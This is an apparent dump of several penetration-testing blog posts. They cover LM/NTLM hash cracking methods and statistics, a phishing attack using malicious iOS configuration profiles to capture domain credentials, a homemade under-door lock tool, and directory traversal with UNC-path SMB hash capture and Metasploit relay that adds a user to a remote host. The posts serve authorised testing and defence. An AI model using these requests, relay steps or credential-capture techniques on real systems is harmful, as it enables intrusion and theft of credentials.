Our standard response has been that we don’t need them anymore. I honestly haven’t needed (or heavily used) them for a while now, as our cracking box has been able to crack the majority of the hashes that we throw at it. This got me thinking about what the actual trade offs are for using our GPUs to crack LM hashes versus using the more traditional method of Rainbow Tables.

Windows Hashes

The LAN Manager (or LM) hashing algorithm is the legacy way of storing password hashes in Windows. The replacement (NTLM) has been around for quite a while, but we still see the LM hashing algorithm being used on both local and domain password hashes.

The LM hash format breaks passwords into two parts. Each part can be up to seven characters long. If the password is seven characters or less, the second part is just a blank LM hash. All of the alphabetical characters are converted to upper case, as the LM hash standard is case insensitive. Case sensitivity is stored in the NTLM hashes.

In the example below, the hash for the password “QBMzftvX” is broken into two parts (QBMZFTV and X). You will also see that all of the cleartext characters of these LM hashes are upper-cased.

Hashexample

For the purpose of this blog, I’ll only be covering the trade offs of using Rainbow Tables for LM hashes. There are NTLM Rainbow Tables, and they can be used with great success, but I won’t be covering the GPU/Rainbow Tables comparison for NTLM in this post.

Rainbow Tables

Traditionally, LM hashes have been attacked with Rainbow Tables. It’s easy to create large tables of these password/hash combinations for every possible LM hash, as you only have to create them for one to seven-character combinations. Once you’ve looked up the hash halves in the tables, you toggle cases on the letters to brute force the password for the case-sensitive NTLM hash. This method works well, but disk reads can be slow and sometimes your computer is busy doing other things, so adding in LM table lookups may slow the rest of your system down. Some great advances have been made by multi-threading the table lookups. This ended up being one of the pain points in writing this blog, as I didn’t have the correct multi-threaded Rainbow Table format to use with rcrack_mt. Additionally, the table lookups were helped by the fact that I was using an SSD to house the Rainbow Tables. I included stats for rcrack_mt table look ups for comparison in the table at the end.

There are two major tradeoffs with using Rainbow Tables. The primary one being disk space. The Rainbow Tables themselves can take up a fair amount of space. I know that disk space is relatively cheap now, but five years ago this was a much bigger deal. The second tradeoff is the time it takes to initially generate the tables. If you are not getting the tables off of the internet (also time consuming), you might be taking days (possibly months) to generate the tables.

GPU Cracking

I really can’t give enough credit to the people working on the Hashcat projects. They do a great job with the software and we use it every day. We use oclHashcat to do GPU brute force attacks on the one to seven character LM hashes. Once cracked, the halves are reassembled and a toggle case attack is run with hashcat (CPU version). Using GPUs to do the brute forcing allows us to save some disk space that would typically be used by the LM tables, and it allows us to offload the cracking to our centralized system. Since we’ve scripted it all, I just pull the LM and NTLM hashes into our script and grab a cup of coffee. But does it save us any time?

Hybrid GPU Rainbow Tables

There are programs (RainbowCrack) that allow for a hybrid attack that uses GPU acceleration to do the Rainbow table lookups. I’ve heard that these programs work well, but RainbowCrack only supports the GPU acceleration through Windows, so that means we won’t be using it on our GPU cracking rig.

The Breakdown

For this test, I generated a set of 100 LM/NTLM hashes from randomly generated passwords of various lengths (a mix of 6-14 character lengths). Cracking with Rainbow Tables was done from my Windows laptop (2.70GHz Intel i7, 16 GB RAM, SSD). GPU cracking was done on our GPU cracking box (5 GPUs).

MethodCrackedTime
Rainbow Tables (OphCrack*)99/10024 Minutes 5 Seconds
oclHashcat/CPU Hashcat100/10018 Minutes 56 Seconds
Rcracki (multithreaded**)100/1005 Minutes 40 Seconds

*OphCrack 3.6.0 run with the XP Special Tables

**Rcracki_mt running with 24 threads

So after all of this effort, I can’t totally justify saying that using oclHashcat/Hashcat is faster for cracking LM hashes, but given our setup, it’s still pretty fast. That being said, if you don’t have your own GPU cracking rig, you will definitely be better off using Rainbow tables, especially if you multi-thread it on a solid state drive.

[post_title] => LM Hash Cracking – Rainbow Tables vs GPU Brute Force [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lm-hash-cracking-rainbow-tables-vs-gpu-brute-force [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1106 [menu_order] => 698 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [53] => WP_Post Object ( [ID] => 1108 [post_author] => 10 [post_date] => 2014-08-18 07:00:48 [post_date_gmt] => 2014-08-18 07:00:48 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the second quarter of 2014 (and so far for this year). The plan is to continue doing this each quarter for the rest of the year to see how we did overall for the year. Please keep in mind that this is not an all encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to.

Q Hash Cracking Pie Chart

The sample for this quarter included three sets of domain hashes that added up to 23,898 hashes. All three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated, so it wasn’t a huge advantage. Of the hashes, 8,277 were duplicates, leaving 15,621 unique hashes. Of the 23,898 hashes, we were able to crack 21,465 (89.82%). Cracked Password Length Breakdown:

Q Hash Cracking Bar Chart

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some interesting finds:
  • Most Common Password (820 instances): Changem3
  • Longest Password: 20 characters
  • Most Common Length (10,897 instances): 8 characters
  • Instances of “password” (case-insensitive): 1,541
  • Instances of “spring2014” (case-insensitive): 111
  • Instances of “spring14” (case-insensitive): 93
  • Instances of “summer2014” (case-insensitive): 84
  • Instances of “summer14” (case-insensitive): 59
So far this year, we’ve collected 33,950 hashes to crack. Of those, we’ve been able to crack 29,077 (85.65%). Some more interesting finds:
  • Most Common Password (1274 instances): Password1
  • Longest Passwords: 20 characters – Two passwords based off of the name of the business group using them
  • Most Common Length (14,339 instances): 8 characters
  • Instances of “password” (case-insensitive): 2,675
  • Instances of “winter2014” (case-insensitive): 23
  • Instances of “winter14” (case-insensitive): 18
  • Instances of “spring2014” (case-insensitive): 102
  • Instances of “spring14” (case-insensitive): 91
I put together an hcmask file (to use with oclHashcat ) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download the files here: Top40_Q2 and Top40 Q1 and Q2. I plan on keeping up with this each quarter, so check back in next quarter to see how this mask files have changed and to see how well we’ve done across the three quarters. For more information on how we built our GPU-enhanced password cracking box, check out our slides For a general outline of our password cracking methodology check out this post [post_title] => Cracking Stats for Q2 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q2-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1108 [menu_order] => 699 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [54] => WP_Post Object ( [ID] => 1116 [post_author] => 10 [post_date] => 2014-06-09 07:00:21 [post_date_gmt] => 2014-06-09 07:00:21 [post_content] => How much can you trust your devices? In this blog post, we will cover a practical attack that utilizes the iPhone Configuration Utility, a malicious Mobile Device Management (MDM) server, and a little bit of social engineering to get you data from iOS devices, HTTP and HTTPS web traffic, and possibly domain credentials.

The Scenario:

To start this off, we will be sending out a .mobileconfig file to iOS devices at the HACKME company. This .mobileconfig file is created with the iPhone Configuration Utility (shown below) and will set up iOS devices to use a specific proxy host when connected to a specific Wi-Fi network. This proxy will be used later to capture HTTP and HTTPS traffic. Additionally, we will configure trusted certificates and an MDM server to use for (malicious) device management. Our example will focus on getting users to install this .mobileconfig with a phishing email. The phishing email will come from support@hackme.com and will have the .mobileconfig file attached. The email will encourage the iPhone owners to install the .mobileconfig to maintain compliance with company policy. Once the target is phished and the profile is installed on their device, we will want their iOS device in range of our wireless access point. This could easily be done with a high powered Wi-Fi access point in the parking lot. If we want even closer access to our targets, we could send someone into the client building with a battery powered 3G/4G AP in a bag and have them run the attack from inside the building.

The Setup:

The first step in this attack is to set up our malicious .mobileconfig profile to send out with the phishing email. This .mobileconfig will have a default Wi-Fi network configured along with a proxy to use when connected to the Wi-Fi. For this demonstration, we will be showing screenshots from the Windows version of the iPhone Configuration Utility. Wi-Fi Network Setup (with proxy settings)

Mdm

If we are going to intercept HTTPS traffic, we are going to need a trusted root CA on the iOS device. This too can be done with the iPhone Configuration Utility. In this attack, we will be using the PortSwigger CA from the Burp proxy.

Mdm

This config will then be exported to a .mobileconfig file, and we will send it along with the phishing email.

Mdm

The only downside to this is the signing of the profile. As of now, it can be a pain to get these properly signed using Windows. The Apple device management utility allows you to specify certs to use for signing, so I would say use the Apple tool for exporting your profiles. Overall this won't too big of a deal, if you're assuming that people will not care about the "Not Verified" warning on the profile.

Mdm

Once the user has the profile installed on their iOS device, we need to get in Wi-Fi range of their device. For simplicity's sake, let's say that we just tailgated into the office and set up shop in an empty office or conference room. A capture device, such as a RaspberryPi or laptop, and wireless AP (with 4G internet access) will be with us and running off of battery power. The capture device could also easily sit in a bag (purse, backpack, etc.) in an unlocked file cabinet. For our safety, we will lock the cabinet and take the key with us. We could then leave the devices for later retrieval, or have the capture device phone home for us to access the proxy logs remotely. At this point, there should be some decent data coming through on the Wi-Fi traffic, but our main goal for this demo is to capture the exchange ActiveSync request. It looks like this:

Mdm

You'll see the Authorization token in the request header. This is actually the base64 encoded domain credentials (HACKMEhackmetest:P@ssword123!) for the iPhone user. Now that we have domain credentials, the rest of the escalation just got a lot easier. We also set up a web clip to deploy to the iOS device. This fake app will be handy in the event that we're unable to get the ActiveSync credentials. The app will look like a branded HACKME company application that opens a web page in Safari containing a login prompt. The malicious site will store any entered credentials and fail on attempts to login. So even if we're not on the same Wi-Fi network, we might be able to get credentials.

Mdm

One additional item to think about is that these profiles do not have to be deployed via email. If an attacker has access to an unlocked device and the passcode, they may be able to install the profile to the iOS device via USB. This attack can be particularly applicable to kiosk iOS devices that allow physical access to their lightning/30-pin connectors. Finally, all of this can be continually manipulated if you set up an MDM server for the device to connect to, but we'll save that for another blog.

Conclusion

Don't leave device management up to your users. If you are using iOS devices in your environment, lock the devices down and prevent users from installing their own configurations. More importantly, go and configure your company devices before an attacker does it for you. [post_title] => Malicious MobileConfigs [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => malicious-mobile-configs [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:52 [post_modified_gmt] => 2021-06-08 21:48:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1116 [menu_order] => 707 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [55] => WP_Post Object ( [ID] => 1117 [post_author] => 10 [post_date] => 2014-06-02 07:00:50 [post_date_gmt] => 2014-06-02 07:00:50 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the first quarter of 2014. The plan is to do this again each quarter for the rest of the year to see how we did overall for the year. There was a relatively small sample for this quarter: just three sets of domain hashes that added up to 10,050 hashes. We are frequently in environments with twice as many users (20k and up), so this is a pretty limited set. One of these sets had LM hashes stored along with the NTLM hashes, making our cracking efforts a little bit easier. Of these hashes, 2,583 were duplicates, leaving 7,184 unique hashes. Of the 10,050 hashes, we were able to crack 7,510 (74.73%).

Q1 Cracking Hashes

Cracked Password Length Breakdown:

Cracked Password

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some more interesting finds:
  • Most Common Password (606 instances): Password1
  • Longest Password: 19 characters - visualmerchandising
  • Most Common Length (3,356 instances): 8 characters
  • Instances of “password” (case-insensitive): 122
  • Instances of [ClientName] (case-insensitive, no modifications, and redacted for obvious reasons): 284
  • Instances of “winter2014” (case-insensitive): 3
  • Instances of “winter14” (case-insensitive): 4
  • Instances of “spring2014” (case-insensitive): 5
  • Instances of “spring14” (case-insensitive): 8
In terms of effort that we put in on each of these hashes, we ran our typical twenty-four hour process on each of the hash files during each of the pentests. Since we keep a dictionary of all of the previously cracked hashes, this made it easier to re-run some of the cracking efforts with the already cracked hashes as a start. We added in some additional cracking time to really go after these hashes, but that was mostly brute force effort. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. You can download it here - Q1Masks. I plan on keeping up with this each quarter, so check back in July to see how this mask file has changed by second quarter and how well we've done over the first half of the year. For more information on how we built our GPU-enhanced password cracking box, check out this presentation we recently did at Secure360: GPU Cracking - On The Cheap For a general outline of our password cracking methodology check out this post: GPU Password Cracking – Building a Better Methodology [post_title] => Cracking Stats for Q1 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q1-2014 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:38 [post_modified_gmt] => 2021-04-13 00:05:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1117 [menu_order] => 708 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [56] => WP_Post Object ( [ID] => 1124 [post_author] => 10 [post_date] => 2014-03-15 07:00:38 [post_date_gmt] => 2014-03-15 07:00:38 [post_content] => In an attempt to speed up our password cracking process, we have run a number of tests to better match our guesses with the passwords that are being used by our clients. This is by no means a definitive cracking methodology, as it will probably change next month, but here's a look at what worked for us on a recent cracking test. For a little background, these hashes were pulled from a domain controller in the last six months. The DC still had some hashes stored in the older LanManager (LM) format in addition to NTLM. The password cracking process is also helped by using any cleartext passwords, recovered during the penetration test, as a dictionary. For this sample, there were:
  • 1000 total hashes (159 LM/NTLM, 841 NTLM-Only)
  • 828 unique hashes
  • 172 accounts with duplicate* passwords (*shared with one or more accounts)
Since LM hashes are weaker, we cracked those first. Initial attacks cracked all of the LM/NTLM hashes, giving us a nice head start (130/828 unique hashes or 15.7% cracked) and a good list to feed back into our other attacks.

The General Methodology:

1. Use the dictionary and rules (Three minutes*) - Remaining Unique Hashes 698

Our dictionary file will typically catch the simple passwords. Our dictionary includes previously cracked passwords and most dictionary-word-based passwords will be in here. Add in a couple of simple rules (d3ad0ne, passwordspro, etc.) and this will catch a few of the "smarter" users with passwords like "1qaz2wsx%". As for the starting rules, we're currently using a mix of the default oclHashcat rules and some of the rules from KoreLogic's 2010 rule list - https://contest-2010.korelogic.com/rules-hashcat.html For our sample set of data, the dictionary attack (with a couple of rules) caught 372 of the remaining 698 hashes (53%).

2. Start with the masking attacks (Fifteen minutes*) - Remaining Unique Hashes 326

Using mask attacks allows us to match common password patterns. Based on the passwords that we've cracked in the past, we identified the fifty most common password patterns (that our clients use). Here's a handy perl script for identifying those patterns - https://pastebin.com/Sybzwf3K. Due to the excessive time that some of these masks take, we've trimmed our list down to forty-three masks. The masks are based on the types of characters being used for the password They follow the following format: ?u?l?l?l?l?d?d?d This is equivalent to (1 Uppercase Character) (4 Lowercase Characters) (3 Decimals). Or a more practical example would be "Netsp199" For more information on masking attacks with oclHashcat - https://hashcat.net/wiki/doku.php?id=mask_attack Our top forty-three masks take about fifteen minutes to run through and caught (29/326) 8% of the remaining uncracked hashes from this sample.

3. Go back to the dictionary, this time with more ammunition (10 minutes*) - Remaining Unique Hashes 297

After we've cracked some of the passwords, we will want to funnel those results back into our mangling attacks. It's not hard for us to guess "!123Acme123!" after we've already cracked "Acme123". Just use the cracked passwords as your dictionary and repeat your rule-based attacks. This is also a good point to combine rules. oclHashcat allows you to combine rule sets to do a multi-vector mangle on your dictionary words. I've had pretty good luck with combining the best64 and the d3ad0neV3 rules, but your mileage may vary. Using this technique, we were able to crack four of the remaining 297 (1.3%) uncracked hashes.

4. Double your dictionary, double your fun? (20-35 minutes)

At this point, we're hitting our limits and need to start getting creative. Along with our hefty primary dictionary, we have a number of shorter dictionaries that are small enough that we can combine them to catch repeaters (e.g. "P@ssword P@ssword"). The attack is pretty simple: a word from the first dictionary will be appended with a word from the second. This style of attack is known as the combinator attack and is run with the -a 1 mode of oclHashcat. Additional rules can be applied to each dictionary to catch some common word delineation patterns ("Super-Secret!"). The example here would append a dash to the first word and an exclamation mark to the second. To be honest, this did not work for this sample set. Normally, we catch a few with this and it can be really handy in some scenarios, but that was not the case here. At this point, we will (typically) be about an hour into our cracking process. From the uniqued sample set, we were able to crack 530 of the 828 hashes (64%) within one hour. From the complete set (including duplicates), we were able to crack 701 of the 1,000 total hashes (70.1%).

5. When all else fails, brute force

Take a look at the company password policy. Seven characters is the minimum? That will take us about forty minutes to go through. Eight characters? A little over two and a half days. What does that mean for our cracking? It means we can easily go after any remaining seven character passwords (where applicable). For those with eight character minimums (or higher), it doesn't hurt for us to run a brute-force overnight on the hashes. Anything we get out of the brute-force can always be pulled back in to the wordlist for the rule-based attacks. Given that a fair amount of our cracking happens during a well-defined project timeframe, we've found that it's best for us to limit the cracking efforts to about twenty-four hours. This prevents us from wasting too much time on a single hash and it frees up our cracking rig for our other projects. If we really need to crack a hash, we'll extend this time limit out, but a day is usually enough to catch most of the hashes we're trying to crack. With the overall efforts that we put in here (~24 hours), we ended up cracking 757 of the 1,000 hashes (75.7%). As luck would have it, I wrote up all of the stats for this blog and immediately proceeded to crack two new sets of NTLM hashes. One was close to 800 hashes (90% cracked) and another had over 5000 hashes (84% cracked). So your results will vary based on the hashes you're trying to crack. *All times are based on our current setup (Four 7950 cards running OclHashcat 1.01) One final item to note. This is not the definitive password cracking methodology. This will probably change for us in the next year, month, week… People are always changing up how they create passwords and that will continue to influence the way we attack their hashes. I'll try to remember to come back to this next year and update with any changes. Did we miss any key cracking strategies? Let me know in the comments. [post_title] => GPU Password Cracking – Building a Better Methodology [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-password-cracking-building-a-better-methodology [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:45 [post_modified_gmt] => 2021-04-13 00:05:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1124 [menu_order] => 714 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [57] => WP_Post Object ( [ID] => 1128 [post_author] => 10 [post_date] => 2014-02-19 07:00:07 [post_date_gmt] => 2014-02-19 07:00:07 [post_content] => NetSPI Senior Security Consultant Karl Fosaaen recently wrote a couple of guest blogs for the upcoming Secure360 2014 Conference blog, you can find them here: If you enjoy these, be sure to make it out to Secure360 this year as Karl will be presenting as well as co-instructing a full-day class on "An Introduction to Penetration Testing" along with NetSPI Principal Consultant Scott Sutherland. To learn more about Secure360, Karl's presentations, or information on how to sign up for the training please visit the pages below: [post_title] => Karl Fosaaen Guest Blogs for Secure360 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => karl-fosaaen-guest-blogs-for-secure360 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:48 [post_modified_gmt] => 2021-04-13 00:05:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1128 [menu_order] => 718 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [58] => WP_Post Object ( [ID] => 1131 [post_author] => 10 [post_date] => 2014-01-27 07:00:46 [post_date_gmt] => 2014-01-27 07:00:46 [post_content] =>

This is a bit of a departure from our technical blogs, but today we're going to show you how to build your own door opening tool out of hardware store materials. For those who are not familiar with a "lever opener tool", it's a tool used by locksmiths (and others) to open doors from the outside. They're long hooks with a string attached. When the hook and string are looped over a door handle (think the L-shaped bar handles), tension is applied to the string and the hook pushes the door handle down.

Here's a professional one made by Keedex Inc.

Doortool

It's my understanding that you have to be a locksmith or an officer of the law in order to purchase/own one of these (Also might depend on your state). But who knows, Amazon is selling them. So as with any of our "how to" blogs, be careful with what you're doing, as it may not be totally legal in your area. TOOOL is a great place to look at for local lock pick laws.

Here's a basic MS Paint diagram of how the tool works.

Untitled

Hook the handle with the top of the tool and pull on the string. This should push the door handle down and you should be able to apply pressure to open the door. These are really simple to operate and can be really handy for entering locked doors. There are a couple of catches though. This will (potentially) not work if the door has a deadbolt. There are doors (see hotel rooms) that typically have linked deadbolts that will unlock when the handle is opened, but not every door is like that.

How to Make Your Own

We started with a couple of requirements on our end for making this:

  • Parts have to be readily available for purchase
  • The tool has to be non-damaging to the door
  • Tool should cost less than $50
    • The current cost of a Keedex K-22 on Amazon

Here's the parts list of everything that we bought.

Part NamePrice
Zinc Threaded Rod ¼”6 Feet - $3.97
Vinyl Coated Steel Rope6 Feet – $1.86
Rod Coupling Nut (optional)3 pack – $1.24
Key Rings (optional)2 pack - $0.97
Heat Shrink Tubing ¼” (optional)8 Feet - $4.97
Pre-Tax Total$13.01

Assembly is pretty simple. If you do not use the heat shrink tubing, the threads may grip into your hands (and the door), so gloves are advised. On that note, it's best to use the tubing, as it will protect the door you are trying to enter from the threads on the rod.

Build Steps:

  1. If you're using the shrink tubing, slide the tubing over the threaded rod. The stuff we used was a pretty close fit, so we only heated up the two ends to seal it to our opener.
  2. Make your first bend about 4-5 inches from one of the ends. This bend should be an 85-90 degree angle, and will serve as the lever for pushing down the handle.
  3. Make your second bend at the base, opposite of your first bend. This will be a curved bend, versus a right angle. This will allow for easier rocking of the opener to bring the lever up to the handle.
  4. Add an additional bend to the base to act as a handle. This will give additional leverage over the opener. You may want to trim this part, you might not. It's up to you.
  5. Add the vinyl coated rope to the lever. This can be attached with electrical tape. We added the coupling nut at the connection point to make it easier to tape the rope down.

At this point, your opener should be ready to use. Make sure that there are no sharp or hard points on the opener, to help protect the door you're trying to open. We also added a handle from a foam sword we had laying around. That is also optional.

Here's the build process beautifully detailed in MS Paint.

Untitled

Here's our finished opener in action.

How to prevent the issue

Preventing this issue is not really a simple solution. However, one simple fix is to add draft guards to the bottom of the door to prevent the tool from being placed under the door. Additionally, handles should not be visible through glass doors. Being able to see the door handle makes it a lot easier to open. Door alarms and motion detectors should also be put in place to detect and alert on unauthorized entries.

[post_title] => Under the Door Tools – Opening Doors for Everyone [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => opening-doors-for-everyone [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:16 [post_modified_gmt] => 2021-06-08 21:51:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1131 [menu_order] => 721 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [59] => WP_Post Object ( [ID] => 1133 [post_author] => 10 [post_date] => 2014-01-13 07:00:41 [post_date_gmt] => 2014-01-13 07:00:41 [post_content] => For some reason I've recently run into a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to expose web server specific files and sensitive information files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.) Here's what a typical vulnerable request looks like:
GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system. Here's an example request for the win.ini file from the web server:
GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This is a more traditional directory traversal attack. We're moving up several directories so that we can go back into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basic concepts out of the way, let's see how we can leverage it against internally deployed web applications. Internally deployed web applications can allow for a much wider attack area (RDP, SMB, etc.) against the web server. This also makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why don't we try and access other systems in the environment. In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers that are running on Windows. Following our previous examples, we will be using a UNC path to our attacking host, instead of report1.pdf for the parameter. Here's an example request:
GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This will force the web server to look for test.pdf at 192.168.1.123. This will allow us to capture and crack the network hashes for the account running the web server service. Here's an example of how we would use Responder.py to do the SMB capture:
python Responder.py -i 192.168.1.123
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface:eth0
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:OFF
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
Serving Executable via HTTP&WPAD is:OFF
Always Serving a Specific File via HTTP&WPAD is:OFF

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123IPC$

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123test.pdf
Once we've captured the credentials, we can try to crack them with oclHashcat. If the server responds with LM hashes, you can use rainbow tables to speed things up. Once cracked, we can see where these credentials have access. Let's pretend that we are not able to crack the hash for the web server account. We can also try to relay these credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the SMB Relay module within Metasploit and Responder recently added support for SMB relay. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system.
Module options (exploit/windows/smb/smb_relay):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SHARE       ADMIN$           yes       The share to connect to
SMBHOST     192.168.1.124    no        The target SMB server
SRVHOST     192.168.1.123    yes       The local host to listen on.
SRVPORT     445              yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate
SSLVersion  SSL3             no        Specify the version of SSL that should be used 

Payload options (windows/adduser):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
CUSTOM                     no        Custom group name to be used instead of default
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
PASS      Password123!     yes       The password for this user
USER      netspi           yes       The username to create
WMIC      false            yes       Use WMIC on the target to resolve administrators group

Exploit running as background job.

Server started.
<------------Truncated------------>
Received 192.168.1.122:21251 EXAMPLEwebserverservice
LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM:
Authenticating to 192.168.1.124 as EXAMPLEwebserverservice...
AUTHENTICATED as EXAMPLEwebserverservice...
Connecting to the defined share...
Regenerating the payload...
Uploading payload...
Created OemWSPRa.exe...
Connecting to the Service Control Manager...
Obtaining a service manager handle...
Creating a new service...
Closing service handle...
Opening service...
Starting the service...
Removing the service...
Closing service handle...
Deleting OemWSPRa.exe...
Sending Access Denied to 192.168.1.122:21251 EXAMPLEwebserverservice
